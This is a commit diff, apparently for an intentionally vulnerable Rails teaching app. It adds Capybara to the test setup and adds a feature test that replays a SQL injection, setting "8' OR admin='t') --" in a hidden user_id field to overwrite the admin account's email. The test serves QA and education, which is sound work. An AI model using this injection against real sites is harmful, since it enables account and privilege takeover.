Capybara added to demonstrate vulnerabilities.

Adding Capybara to verify replay-ability of hacking vulnerabilities. I
imagine these may want to be kept on a different branch for QA and
educational purposes, but not distributed with master when forked.

This commit also includes demonstrating the SQL Injection vulnerability.

spec/features/sql_injection_spec.rb

@@ -0,0 +1,37 @@
+require 'spec_helper'
+
+feature 'sql injection' do
+  before do
+    User.delete_all
+    Rails.application.load_seed
+    @normal_user = User.create!(:first_name => 'Joe', :last_name => 'Schmoe',
+                                :email => 'joe@schmoe.com', :password => 'aoeuaoeu', :password_confirmation => 'aoeuaoeu')
+    @admin_user = User.where("admin='t'").first
+  end
+
+  scenario 'injection attack on account_settings' do
+    @admin_user.admin.should be_true
+
+    visit '/'
+    within('.signup') do
+      fill_in 'email', :with => 'joe@schmoe.com'
+      fill_in 'password', :with => 'aoeuaoeu'
+    end
+    click_on 'Login'
+
+    visit "/users/#{@normal_user.user_id}/account_settings"
+    within('#account_edit') do
+      fill_in 'Email', :with => 'joe.admin@schmoe.com'
+      fill_in 'user_password', :with => 'hacketyhack'
+      fill_in 'user_password_confirmation', :with => 'hacketyhack'
+
+      # this is a hidden field, so cannot use fill_in to access it.
+      find(:xpath, "//input[@id='user_user_id']", :visible => false).set "8' OR admin='t') --"
+    end
+    click_on 'Submit'
+
+    @admin_user = User.where("admin='t'").first
+    @admin_user.email.should == 'joe.admin@schmoe.com'
+    @admin_user.admin.should == true
+  end
+end

spec/spec_helper.rb

@@ -3,6 +3,9 @@ ENV["RAILS_ENV"] ||= 'test'
 require File.expand_path("../../config/environment", __FILE__)
 require 'rspec/rails'
 require 'rspec/autorun'
+require 'capybara/rails'
+require 'capybara/poltergeist'
+require 'database_cleaner'
 
 # Requires supporting ruby files with custom matchers and macros, etc,
 # in spec/support/ and its subdirectories.
@@ -23,7 +26,7 @@ RSpec.configure do |config|
   # If you're not using ActiveRecord, or you'd prefer not to run each of your
   # examples within a transaction, remove the following line or assign false
   # instead of true.
-  config.use_transactional_fixtures = true
+  config.use_transactional_fixtures = false # Capybara Poltergeist driver requires this
 
   # If true, the base class of anonymous controllers will be inferred
   # automatically. This will be the default behavior in future versions of
@@ -35,4 +38,16 @@ RSpec.configure do |config|
   # the seed, which is printed after each run.
   #     --seed 1234
   config.order = "random"
+
+  config.before(:each) do
+    DatabaseCleaner.start
+  end
+
+  config.after(:each) do
+    DatabaseCleaner.clean
+  end
 end
+
+Capybara.javascript_driver = :poltergeist
+
+DatabaseCleaner.strategy = :truncation